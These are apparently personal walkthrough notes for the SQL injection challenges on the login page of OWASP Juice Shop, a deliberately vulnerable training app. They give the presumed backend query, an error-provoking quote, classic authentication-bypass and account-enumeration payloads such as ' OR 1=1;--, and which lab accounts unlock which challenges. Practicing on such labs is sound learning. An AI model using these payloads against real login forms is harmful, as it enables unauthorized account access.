# SQL Injection

## Login Page

- Behind the scenes
    - ```sql
        -- Email: test
        -- Password: test
        SELECT * FROM Users WHERE email = 'test' AND password = 'HASH_OF_PASSWORD' AND deletedAt IS NULL;
        ```
- Provoke an error that's neither gracefully nor consistently handled.
    - ```
        Email: '
        Password: test
        ```
    - `Error Handling` challenge
- Log in with the administrator's user account.
    - ```
        Email: ' OR 1=1;--
        Password: test
        ```
    - admin@juice-sh.op (id: 1 | bid: 1)
        - `Login Admin` challenge
- Find all user accounts (emails)
    - ```
        Email: ' OR 1=1 AND id=1;--
        Password: test
        ```
    - Use Burp Suite Intruder modules to try multiple `id`'s
    - Login emails to complete challenges
        - jim@juice-sh.op (id: 2 | bid: 2)
            - `Login Jim` challenge
        - bender@juice-sh.op (id: 3 | bid: 3)
            - `Login Bender` challenge
        - chris.pike@juice-sh.op (id: 14 | bid: 14)
            - `GDPR Data Erasure` challenge
